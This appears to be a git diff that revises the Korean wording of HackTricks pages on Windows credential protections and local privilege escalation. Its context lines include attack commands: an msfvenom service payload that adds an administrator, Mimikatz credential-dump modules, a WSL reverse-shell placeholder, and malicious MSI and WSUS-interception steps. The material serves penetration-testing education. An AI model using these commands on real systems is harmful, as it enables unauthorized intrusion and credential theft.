 포괄적인 이해와 **Credential Guard**를 Windows 10에서 활성화하는 방법 및 **Windows 11 Enterprise 및 Education (버전 22H2)**의 호환 시스템에서 자동으로 활성화하는 방법에 대한 지침은 [Microsoft의 문서](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage)를 방문하세요.
 
-자격 증명 캡처를 위한 사용자 지정 SSP 구현에 대한 추가 세부정보는 [이 가이드](../active-directory-methodology/custom-ssp.md)에 제공됩니다.
+자격 증명 캡처를 위한 사용자 지정 SSP 구현에 대한 추가 세부정보는 [이 가이드](../active-directory-methodology/custom-ssp.md)에서 제공됩니다.
 
 ## RDP RestrictedAdmin 모드
 
-**Windows 8.1 및 Windows Server 2012 R2**는 _**RDP를 위한 Restricted Admin 모드**_를 포함하여 여러 새로운 보안 기능을 도입했습니다. 이 모드는 [**pass the hash**](https://blog.ahasayen.com/pass-the-hash/) 공격과 관련된 위험을 완화하여 보안을 강화하도록 설계되었습니다.
+**Windows 8.1 및 Windows Server 2012 R2**는 _**RDP를 위한 Restricted Admin 모드**_를 포함하여 여러 새로운 보안 기능을 도입했습니다. 이 모드는 [**pass the hash**](https://blog.ahasayen.com/pass-the-hash/) 공격과 관련된 위험을 완화하여 보안을 강화하기 위해 설계되었습니다.
 
 전통적으로 RDP를 통해 원격 컴퓨터에 연결할 때, 자격 증명은 대상 컴퓨터에 저장됩니다. 이는 특히 권한이 상승된 계정을 사용할 때 상당한 보안 위험을 초래합니다. 그러나 _**Restricted Admin 모드**_의 도입으로 이 위험이 크게 줄어듭니다.
 
 **mstsc.exe /RestrictedAdmin** 명령을 사용하여 RDP 연결을 시작할 때, 원격 컴퓨터에 대한 인증은 자격 증명을 저장하지 않고 수행됩니다. 이 접근 방식은 악성 소프트웨어 감염이 발생하거나 악의적인 사용자가 원격 서버에 접근할 경우, 자격 증명이 서버에 저장되지 않기 때문에 손상되지 않도록 보장합니다.
 
-**Restricted Admin 모드**에서는 RDP 세션에서 네트워크 리소스에 접근하려는 시도가 개인 자격 증명을 사용하지 않으며, 대신 **기계의 ID**가 사용된다는 점에 유의해야 합니다.
+**Restricted Admin 모드**에서는 RDP 세션에서 네트워크 리소스에 접근하려고 할 때 개인 자격 증명을 사용하지 않으며, 대신 **기계의 ID**가 사용됩니다.
 
 이 기능은 원격 데스크톱 연결을 보호하고 보안 위반 시 민감한 정보가 노출되는 것을 방지하는 데 중요한 진전을 나타냅니다.
 
@@ -64,21 +64,21 @@ Windows는 **Local Security Authority (LSA)**를 통해 **도메인 자격 증
 ```bash
 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
 ```
-이 캐시된 자격 증명에 대한 접근은 엄격하게 제어되며, **SYSTEM** 계정만이 이를 볼 수 있는 필요한 권한을 가지고 있습니다. 이 정보를 액세스해야 하는 관리자는 SYSTEM 사용자 권한으로 수행해야 합니다. 자격 증명은 다음에 저장됩니다: `HKEY_LOCAL_MACHINE\SECURITY\Cache`
+이 캐시된 자격 증명에 대한 접근은 엄격하게 제어되며, **SYSTEM** 계정만이 이를 볼 수 있는 필요한 권한을 가지고 있습니다. 이 정보를 접근해야 하는 관리자는 SYSTEM 사용자 권한으로 접근해야 합니다. 자격 증명은 다음에 저장됩니다: `HKEY_LOCAL_MACHINE\SECURITY\Cache`
 
-**Mimikatz**는 `lsadump::cache` 명령을 사용하여 이러한 캐시된 자격 증명을 추출하는 데 사용될 수 있습니다.
+**Mimikatz**는 `lsadump::cache` 명령어를 사용하여 이 캐시된 자격 증명을 추출하는 데 사용될 수 있습니다.
 
 자세한 내용은 원본 [source](http://juggernaut.wikidot.com/cached-credentials)에서 포괄적인 정보를 제공합니다.
 
 ## 보호된 사용자
 
-**Protected Users group**의 구성원 자격은 사용자에게 여러 보안 향상을 도입하여 자격 증명 도용 및 남용에 대한 더 높은 수준의 보호를 보장합니다:
+**Protected Users group**의 구성원은 자격 증명 도용 및 남용에 대한 더 높은 수준의 보호를 보장하는 여러 보안 향상을 도입합니다:
 
 - **Credential Delegation (CredSSP)**: **Allow delegating default credentials**에 대한 그룹 정책 설정이 활성화되어 있더라도, 보호된 사용자의 평문 자격 증명은 캐시되지 않습니다.
 - **Windows Digest**: **Windows 8.1 및 Windows Server 2012 R2**부터 시스템은 보호된 사용자의 평문 자격 증명을 캐시하지 않으며, Windows Digest 상태와 관계없이 적용됩니다.
-- **NTLM**: 시스템은 보호된 사용자의 평문 자격 증명이나 NT 일방향 함수(NTOWF)를 캐시하지 않습니다.
+- **NTLM**: 시스템은 보호된 사용자의 평문 자격 증명이나 NT 일방 함수(NTOWF)를 캐시하지 않습니다.
 - **Kerberos**: 보호된 사용자의 경우, Kerberos 인증은 **DES** 또는 **RC4 키**를 생성하지 않으며, 초기 티켓 부여 티켓(TGT) 획득을 초과하여 평문 자격 증명이나 장기 키를 캐시하지 않습니다.
-- **오프라인 로그인**: 보호된 사용자는 로그인 또는 잠금 해제 시 캐시된 검증자가 생성되지 않으므로 이러한 계정에 대한 오프라인 로그인이 지원되지 않습니다.
+- **오프라인 로그인**: 보호된 사용자는 로그인 또는 잠금 해제 시 캐시된 검증자가 생성되지 않으므로, 이러한 계정에 대한 오프라인 로그인이 지원되지 않습니다.
 
 이러한 보호는 **Protected Users group**의 구성원이 장치에 로그인하는 순간 활성화됩니다. 이는 다양한 자격 증명 손상 방법으로부터 보호하기 위한 중요한 보안 조치가 마련되어 있음을 보장합니다.
 
diff --git a/src/windows-hardening/stealing-credentials/wts-impersonator.md b/src/windows-hardening/stealing-credentials/wts-impersonator.md
index 4a0ae8bca..e7dceb7a0 100644
--- a/src/windows-hardening/stealing-credentials/wts-impersonator.md
+++ b/src/windows-hardening/stealing-credentials/wts-impersonator.md
@@ -1,6 +1,6 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**WTS Impersonator** 도구는 **"\\pipe\LSM_API_service"** RPC 명명된 파이프를 이용하여 로그인한 사용자를 은밀하게 열거하고 그들의 토큰을 탈취하여 전통적인 토큰 위장 기법을 우회합니다. 이 접근 방식은 네트워크 내에서 원활한 측면 이동을 촉진합니다. 이 기술의 혁신은 **Omri Baso**에게 기인하며, 그의 작업은 [GitHub](https://github.com/OmriBaso/WTSImpersonator)에서 확인할 수 있습니다.
+**WTS Impersonator** 도구는 **"\\pipe\LSM_API_service"** RPC 명명된 파이프를 이용하여 로그인한 사용자를 은밀하게 열거하고 그들의 토큰을 탈취하여 전통적인 토큰 위장 기법을 우회합니다. 이 접근 방식은 네트워크 내에서 원활한 수평 이동을 가능하게 합니다. 이 기법의 혁신은 **Omri Baso**에게서 비롯되었으며, 그의 작업은 [GitHub](https://github.com/OmriBaso/WTSImpersonator)에서 확인할 수 있습니다.
 
 ### 핵심 기능
 
@@ -21,7 +21,7 @@ WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken →
 .\WTSImpersonator.exe -m enum -s 192.168.40.131
 ```
 
-- **명령 실행**: `exec` 및 `exec-remote` 모듈은 작동을 위해 **서비스** 컨텍스트가 필요합니다. 로컬 실행은 WTSImpersonator 실행 파일과 명령만 필요합니다:
+- **명령 실행**: `exec` 및 `exec-remote` 모듈은 작동하기 위해 **서비스** 컨텍스트가 필요합니다. 로컬 실행은 WTSImpersonator 실행 파일과 명령만 필요합니다:
 
 - 로컬 명령 실행 예:
 ```powershell
diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md
index 33973d683..3b5505383 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/README.md
@@ -24,7 +24,7 @@ acls-dacls-sacls-aces.md
 
 ### 무결성 수준
 
-**Windows의 무결성 수준이 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽어야 합니다:**
+**Windows에서 무결성 수준이 무엇인지 모른다면, 계속하기 전에 다음 페이지를 읽어야 합니다:**
 
 {{#ref}}
 integrity-levels.md
@@ -32,7 +32,7 @@ integrity-levels.md
 
 ## Windows 보안 제어
 
-Windows에는 **시스템을 열거하는 것을 방지**하거나 실행 파일을 실행하거나 **활동을 감지하는 것**을 **막을 수 있는** 다양한 요소가 있습니다. 권한 상승 열거를 시작하기 전에 다음 **페이지**를 **읽고** 모든 **방어** **메커니즘**을 **열거**해야 합니다:
+Windows에는 **시스템을 열거하는 것을 방지**하거나 실행 파일을 실행하거나 심지어 **활동을 감지하는** 다양한 요소가 있습니다. 권한 상승 열거를 시작하기 전에 다음 **페이지**를 **읽고** 모든 **방어** **메커니즘**을 **열거**해야 합니다:
 
 {{#ref}}
 ../authentication-credentials-uac-and-efs/
@@ -64,7 +64,7 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
 - _post/windows/gather/enum_patches_
 - _post/multi/recon/local_exploit_suggester_
 - [_watson_](https://github.com/rasta-mouse/Watson)
-- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas에는 watson이 내장되어 있습니다)_
+- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas는 watson이 내장되어 있습니다)_
 
 **시스템 정보로 로컬에서**
 
@@ -79,7 +79,7 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
 
 ### Environment
 
-env 변수에 저장된 자격 증명/유용한 정보가 있습니까?
+환경 변수에 저장된 자격 증명/유용한 정보가 있습니까?
 ```bash
 set
 dir env:
@@ -127,14 +127,14 @@ Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
 ```
 ### PowerShell **스크립트 블록 로깅**
 
-스크립트 실행의 전체 활동 및 전체 콘텐츠 기록이 캡처되어, 실행되는 모든 코드 블록이 문서화됩니다. 이 프로세스는 각 활동의 포괄적인 감사 추적을 보존하여 포렌식 및 악의적인 행동 분석에 유용합니다. 실행 시 모든 활동을 문서화함으로써 프로세스에 대한 자세한 통찰력을 제공합니다.
+스크립트 실행의 전체 활동 및 전체 콘텐츠 기록이 캡처되어, 실행되는 모든 코드 블록이 문서화됩니다. 이 과정은 각 활동의 포괄적인 감사 추적을 보존하여 포렌식 및 악의적인 행동 분석에 유용합니다. 실행 시 모든 활동을 문서화함으로써 프로세스에 대한 자세한 통찰력을 제공합니다.
 ```bash
 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
 ```
-스크립트 블록에 대한 로그 이벤트는 Windows 이벤트 뷰어의 경로 **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**에서 찾을 수 있습니다.\
+스크립트 블록에 대한 로그 이벤트는 Windows 이벤트 뷰어의 경로 **응용 프로그램 및 서비스 로그 > Microsoft > Windows > PowerShell > 운영**에서 찾을 수 있습니다.\
 마지막 20개의 이벤트를 보려면 다음을 사용할 수 있습니다:
 ```bash
 Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
@@ -154,7 +154,7 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}|
 
 시스템을 손상시킬 수 있습니다. 업데이트가 http가 아닌 http**S**를 사용하여 요청되지 않는 경우입니다.
 
-다음 명령을 실행하여 네트워크가 비SSL WSUS 업데이트를 사용하는지 확인합니다:
+다음 명령을 실행하여 네트워크가 비 SSL WSUS 업데이트를 사용하는지 확인합니다:
 ```
 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
 ```
@@ -163,11 +163,11 @@ reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
 WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
 ```
-`HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer`가 `1`과 같다면, 
+`HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer`가 `1`과 같으면,
 
-그렇다면, **악용 가능하다.** 마지막 레지스트리가 0과 같으면, WSUS 항목은 무시된다.
+그렇다면, **악용 가능**합니다. 마지막 레지스트리가 0과 같으면, WSUS 항목은 무시됩니다.
 
-이 취약점을 악용하기 위해서는 다음과 같은 도구를 사용할 수 있다: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - 이는 비SSL WSUS 트래픽에 '가짜' 업데이트를 주입하기 위한 MiTM 무기화된 익스플로잇 스크립트이다.
+이 취약점을 악용하기 위해 다음과 같은 도구를 사용할 수 있습니다: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - 이는 비 SSL WSUS 트래픽에 '가짜' 업데이트를 주입하기 위한 MiTM 무기화된 익스플로잇 스크립트입니다.
 
 여기에서 연구를 읽어보세요:
 
@@ -176,17 +176,17 @@ WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
 **WSUS CVE-2020-1013**
 
 [**전체 보고서를 여기에서 읽어보세요**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\
-기본적으로, 이 버그가 악용하는 결함은 다음과 같다:
+기본적으로, 이 버그가 악용하는 결함은 다음과 같습니다:
 
-> 우리가 로컬 사용자 프록시를 수정할 수 있는 권한이 있고, Windows 업데이트가 Internet Explorer의 설정에 구성된 프록시를 사용한다면, 우리는 [PyWSUS](https://github.com/GoSecure/pywsus)를 로컬에서 실행하여 자신의 트래픽을 가로채고 자산에서 상승된 사용자로서 코드를 실행할 수 있는 권한을 가지게 된다.
+> 우리가 로컬 사용자 프록시를 수정할 수 있는 권한이 있고, Windows 업데이트가 Internet Explorer의 설정에 구성된 프록시를 사용한다면, 우리는 [PyWSUS](https://github.com/GoSecure/pywsus)를 로컬에서 실행하여 자신의 트래픽을 가로채고 자산에서 상승된 사용자로서 코드를 실행할 수 있는 권한을 가지게 됩니다.
 >
-> 게다가, WSUS 서비스는 현재 사용자의 설정을 사용하므로, 현재 사용자의 인증서 저장소도 사용할 것이다. WSUS 호스트 이름에 대해 자체 서명된 인증서를 생성하고 이 인증서를 현재 사용자의 인증서 저장소에 추가하면, HTTP 및 HTTPS WSUS 트래픽을 모두 가로챌 수 있다. WSUS는 인증서에 대한 신뢰-첫 사용 유형 검증을 구현하기 위해 HSTS와 유사한 메커니즘을 사용하지 않는다. 제시된 인증서가 사용자에 의해 신뢰되고 올바른 호스트 이름을 가지고 있다면, 서비스에 의해 수용될 것이다.
+> 게다가, WSUS 서비스는 현재 사용자의 설정을 사용하므로, 현재 사용자의 인증서 저장소도 사용합니다. WSUS 호스트 이름에 대해 자체 서명된 인증서를 생성하고 이 인증서를 현재 사용자의 인증서 저장소에 추가하면, HTTP 및 HTTPS WSUS 트래픽을 모두 가로챌 수 있습니다. WSUS는 인증서에 대한 신뢰-첫-사용 유형 검증을 구현하기 위해 HSTS와 유사한 메커니즘을 사용하지 않습니다. 제시된 인증서가 사용자가 신뢰하고 올바른 호스트 이름을 가지고 있다면, 서비스에 의해 수용됩니다.
 
-이 취약점을 [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) 도구를 사용하여 악용할 수 있다 (해방되면).
+이 취약점을 [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) 도구를 사용하여 악용할 수 있습니다 (해방되면).
 
 ## KrbRelayUp
 
-**로컬 권한 상승** 취약점이 특정 조건 하에 Windows **도메인** 환경에 존재한다. 이러한 조건에는 **LDAP 서명이 시행되지 않는** 환경, 사용자가 **리소스 기반 제약 위임(RBCD)**을 구성할 수 있는 자기 권한을 가지며, 사용자가 도메인 내에서 컴퓨터를 생성할 수 있는 능력이 포함된다. 이러한 **요구 사항**은 **기본 설정**을 사용하여 충족된다는 점에 유의해야 한다.
+**로컬 권한 상승** 취약점이 특정 조건 하에 Windows **도메인** 환경에 존재합니다. 이러한 조건에는 **LDAP 서명이 시행되지 않는** 환경, 사용자가 **리소스 기반 제약 위임(RBCD)**을 구성할 수 있는 자기 권한을 가진 경우, 도메인 내에서 컴퓨터를 생성할 수 있는 사용자의 능력이 포함됩니다. 이러한 **요구 사항**은 **기본 설정**을 사용하여 충족된다는 점에 유의해야 합니다.
 
 **악용을 찾으세요** [**https://github.com/Dec0ne/KrbRelayUp**](https://github.com/Dec0ne/KrbRelayUp)
 
@@ -194,7 +194,7 @@ WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535
 
 ## AlwaysInstallElevated
 
-**이** 2개의 레지스터가 **활성화**되어 있다면 (값이 **0x1**), 모든 권한의 사용자가 NT AUTHORITY\\**SYSTEM**으로 `*.msi` 파일을 **설치**(실행)할 수 있다.
+**이** 2개의 레지스터가 **활성화**되어 있다면 (값이 **0x1**), 모든 권한의 사용자가 NT AUTHORITY\\**SYSTEM**으로 `*.msi` 파일을 **설치**(실행)할 수 있습니다.
 ```bash
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
@@ -230,7 +230,7 @@ create-msi-with-wix.md
 
 ### Visual Studio로 MSI 만들기
 
-- **Cobalt Strike** 또는 **Metasploit**를 사용하여 `C:\privesc\beacon.exe`에 **새 Windows EXE TCP 페이로드**를 **생성**합니다.
+- **Cobalt Strike** 또는 **Metasploit**로 `C:\privesc\beacon.exe`에 **새 Windows EXE TCP 페이로드**를 **생성**합니다.
 - **Visual Studio**를 열고 **새 프로젝트 만들기**를 선택한 후 검색 상자에 "installer"를 입력합니다. **Setup Wizard** 프로젝트를 선택하고 **Next**를 클릭합니다.
 - 프로젝트 이름을 **AlwaysPrivesc**로 지정하고 위치에 **`C:\privesc`**를 사용하며, **솔루션과 프로젝트를 동일한 디렉터리에 배치**를 선택하고 **Create**를 클릭합니다.
 - 4단계 중 3단계(포함할 파일 선택)에 도달할 때까지 **Next**를 계속 클릭합니다. **Add**를 클릭하고 방금 생성한 Beacon 페이로드를 선택합니다. 그런 다음 **Finish**를 클릭합니다.
@@ -283,7 +283,7 @@ reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v U
 ### LSA 보호
 
 **Windows 8.1**부터 Microsoft는 신뢰할 수 없는 프로세스가 **메모리를 읽거나** 코드를 주입하려는 시도를 **차단**하기 위해 로컬 보안 권한(LSA)에 대한 향상된 보호 기능을 도입하여 시스템을 더욱 안전하게 만들었습니다.\
-[**LSA 보호에 대한 자세한 정보는 여기에서**](../stealing-credentials/credentials-protections.md#lsa-protection).
+[**LSA 보호에 대한 자세한 정보는 여기에서 확인하세요**](../stealing-credentials/credentials-protections.md#lsa-protection).
 ```bash
 reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL
 ```
@@ -321,7 +321,7 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 ```
 ### 권한 그룹
 
-당신이 **특권 그룹에 속한다면 권한을 상승시킬 수 있습니다**. 특권 그룹에 대해 배우고 이를 악용하여 권한을 상승시키는 방법은 여기에서 확인하세요:
+당신이 **특권 그룹에 속해 있다면 권한을 상승시킬 수 있습니다**. 특권 그룹에 대해 배우고 이를 악용하여 권한을 상승시키는 방법은 여기에서 확인하세요:
 
 {{#ref}}
 ../active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -397,7 +397,7 @@ procdump.exe -accepteula -ma <proc_name_tasklist>
 ```
 ### 안전하지 않은 GUI 앱
 
-**SYSTEM으로 실행되는 애플리케이션은 사용자가 CMD를 실행하거나 디렉토리를 탐색할 수 있게 할 수 있습니다.**
+**SYSTEM으로 실행되는 애플리케이션은 사용자가 CMD를 실행하거나 디렉토리를 탐색할 수 있도록 허용할 수 있습니다.**
 
 예: "Windows 도움말 및 지원" (Windows + F1), "명령 프롬프트" 검색, "명령 프롬프트 열기 클릭" 클릭
 
@@ -474,7 +474,7 @@ net stop [service name] && net start [service name]
 
 ### 서비스 바이너리의 약한 권한
 
-**서비스에 의해 실행되는 바이너리를 수정할 수 있는지 확인**하거나 **바이너리가 위치한 폴더에 대한 쓰기 권한이 있는지 확인**하십시오 ([**DLL Hijacking**](dll-hijacking/))**.**\
+**서비스에 의해 실행되는 바이너리를 수정할 수 있는지 확인**하거나 **바이너리가 위치한 폴더에 대한 쓰기 권한이 있는지 확인**하세요 ([**DLL Hijacking**](dll-hijacking/))**.**\
 **wmic**를 사용하여 서비스에 의해 실행되는 모든 바이너리를 가져오고 **icacls**를 사용하여 권한을 확인할 수 있습니다:
 ```bash
 for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
@@ -490,7 +490,7 @@ FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >>
 ### 서비스 레지스트리 수정 권한
 
 서비스 레지스트리를 수정할 수 있는지 확인해야 합니다.\
-서비스 **레지스트리**에 대한 **권한**을 확인하려면 다음을 수행하십시오:
+서비스 **레지스트리**에 대한 **권한**을 확인하려면 다음을 수행할 수 있습니다:
 ```bash
 reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
 
@@ -507,7 +507,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t RE
 ```
 ### 서비스 레지스트리 AppendData/AddSubdirectory 권한
 
-레지스트리에 대해 이 권한이 있으면 **이 레지스트리에서 하위 레지스트리를 생성할 수 있습니다**. Windows 서비스의 경우 이는 **임의 코드를 실행하기에 충분합니다:**
+이 권한이 레지스트리에 있으면 **이 레지스트리에서 하위 레지스트리를 생성할 수 있습니다**. Windows 서비스의 경우, 이는 **임의의 코드를 실행하기에 충분합니다:**
 
 {{#ref}}
 appenddata-addsubdirectory-permission-over-service-registry.md
@@ -543,7 +543,7 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s &&
 ```powershell
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
-**이 취약점을 탐지하고 악용할 수 있습니다** 메타스플로잇을 사용하여: `exploit/windows/local/trusted\_service\_path` 메타스플로잇을 사용하여 서비스 바이너리를 수동으로 생성할 수 있습니다:
+**이 취약점을 탐지하고 악용할 수 있습니다** metasploit를 사용하여: `exploit/windows/local/trusted\_service\_path` metasploit를 사용하여 서비스 바이너리를 수동으로 생성할 수 있습니다:
 ```bash
 msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
 ```
@@ -566,7 +566,7 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 ```
 ### 쓰기 권한
 
-특정 파일을 읽기 위해 일부 구성 파일을 수정할 수 있는지 또는 관리자 계정(schedtasks)에 의해 실행될 이진 파일을 수정할 수 있는지 확인하십시오.
+특정 파일을 읽기 위해 일부 구성 파일을 수정할 수 있는지 또는 관리자 계정에 의해 실행될 이진 파일(예: schedtasks)을 수정할 수 있는지 확인하십시오.
 
 시스템에서 약한 폴더/파일 권한을 찾는 방법은 다음과 같습니다:
 ```bash
@@ -664,9 +664,9 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
 
 [**방화벽 관련 명령어는 이 페이지를 확인하세요**](../basic-cmd-for-pentesters.md#firewall) **(규칙 목록, 규칙 생성, 끄기, 끄기...)**
 
-네트워크 열거를 위한 더 많은[ 명령어는 여기](../basic-cmd-for-pentesters.md#network)에서 확인하세요.
+더 많은 [네트워크 열거 명령어는 여기](../basic-cmd-for-pentesters.md#network)에서 확인하세요.
 
-### 윈도우용 리눅스 하위 시스템 (wsl)
+### 윈도우 리눅스 하위 시스템 (wsl)
 ```bash
 C:\Windows\System32\bash.exe
 C:\Windows\System32\wsl.exe
@@ -680,7 +680,7 @@ wsl whoami
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
-bash를 루트로 쉽게 시작하려면 `--default-user root`를 시도해 볼 수 있습니다.
+bash를 루트로 쉽게 시작하려면 `--default-user root`를 시도할 수 있습니다.
 
 `WSL` 파일 시스템은 `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` 폴더에서 탐색할 수 있습니다.
 
@@ -731,7 +731,7 @@ mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credential
 
 **DPAPI는 사용자의 로그인 비밀에서 파생된 대칭 키를 통해 키의 암호화를 가능하게 합니다**. 시스템 암호화가 포함된 시나리오에서는 시스템의 도메인 인증 비밀을 사용합니다.
 
-DPAPI를 사용하여 암호화된 사용자 RSA 키는 `%APPDATA%\Microsoft\Protect\{SID}` 디렉토리에 저장되며, 여기서 `{SID}`는 사용자의 [보안 식별자](https://en.wikipedia.org/wiki/Security_Identifier)를 나타냅니다. **DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 함께 위치하며**, 일반적으로 64바이트의 임의 데이터로 구성됩니다. (이 디렉토리에 대한 접근은 제한되어 있어 CMD의 `dir` 명령어로 내용을 나열할 수 없지만, PowerShell을 통해 나열할 수 있습니다).
+DPAPI를 사용하여 암호화된 사용자 RSA 키는 `%APPDATA%\Microsoft\Protect\{SID}` 디렉토리에 저장되며, 여기서 `{SID}`는 사용자의 [보안 식별자](https://en.wikipedia.org/wiki/Security_Identifier)를 나타냅니다. **DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 위치하며**, 일반적으로 64바이트의 임의 데이터로 구성됩니다. (이 디렉토리에 대한 접근은 제한되어 있어 CMD의 `dir` 명령어로 내용을 나열할 수 없지만, PowerShell을 통해 나열할 수 있습니다).
 ```powershell
 Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
 Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\
@@ -746,7 +746,7 @@ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
 **mimikatz 모듈** `dpapi::cred`를 사용하여 적절한 `/masterkey`로 복호화할 수 있습니다.\
-**메모리**에서 **많은 DPAPI** **마스터키**를 `sekurlsa::dpapi` 모듈을 사용하여 추출할 수 있습니다(루트 권한이 있는 경우).
+**메모리**에서 **많은 DPAPI** **마스터키**를 `sekurlsa::dpapi` 모듈을 사용하여 추출할 수 있습니다 (루트 권한이 있는 경우).
 
 {{#ref}}
 dpapi-extracting-passwords.md
@@ -754,7 +754,7 @@ dpapi-extracting-passwords.md
 
 ### PowerShell 자격 증명
 
-**PowerShell 자격 증명**은 종종 **스크립팅** 및 자동화 작업을 위해 암호화된 자격 증명을 편리하게 저장하는 방법으로 사용됩니다. 자격 증명은 **DPAPI**를 사용하여 보호되며, 이는 일반적으로 동일한 컴퓨터에서 동일한 사용자만 복호화할 수 있음을 의미합니다.
+**PowerShell 자격 증명**은 종종 **스크립팅** 및 자동화 작업을 위해 암호화된 자격 증명을 편리하게 저장하는 방법으로 사용됩니다. 자격 증명은 **DPAPI**를 사용하여 보호되며, 일반적으로 이는 동일한 컴퓨터에서 동일한 사용자에 의해서만 복호화될 수 있음을 의미합니다.
 
 자격 증명이 포함된 파일에서 PS 자격 증명을 **복호화**하려면 다음과 같이 할 수 있습니다:
 ```powershell
@@ -914,7 +914,7 @@ reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
 Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
 ```
 > [!NOTE]
-> 이 기술은 더 이상 유효하지 않은 것 같습니다. 나는 몇 개의 ssh 키를 생성하고 `ssh-add`로 추가한 후 ssh를 통해 머신에 로그인하려고 했습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys가 존재하지 않으며 procmon은 비대칭 키 인증 중에 `dpapi.dll`의 사용을 식별하지 못했습니다.
+> 이 기술은 더 이상 유효하지 않은 것 같습니다. 나는 몇 개의 ssh 키를 생성하고 `ssh-add`로 추가한 후 ssh를 통해 머신에 로그인하려고 했습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys는 존재하지 않으며 procmon은 비대칭 키 인증 중에 `dpapi.dll`의 사용을 식별하지 못했습니다.
 
 ### Unattended files
 ```
@@ -978,9 +978,9 @@ AppData\Roaming\gcloud\access_tokens.db
 
 ### Cached GPP Pasword
 
-이전에는 Group Policy Preferences (GPP)를 통해 여러 머신에 사용자 정의 로컬 관리자 계정을 배포할 수 있는 기능이 제공되었습니다. 그러나 이 방법에는 심각한 보안 결함이 있었습니다. 첫째, SYSVOL에 XML 파일로 저장된 Group Policy Objects (GPOs)는 모든 도메인 사용자가 접근할 수 있었습니다. 둘째, 공개적으로 문서화된 기본 키를 사용하여 AES256으로 암호화된 이러한 GPP 내의 비밀번호는 인증된 사용자가 복호화할 수 있었습니다. 이는 사용자가 권한 상승을 얻을 수 있는 심각한 위험을 초래했습니다.
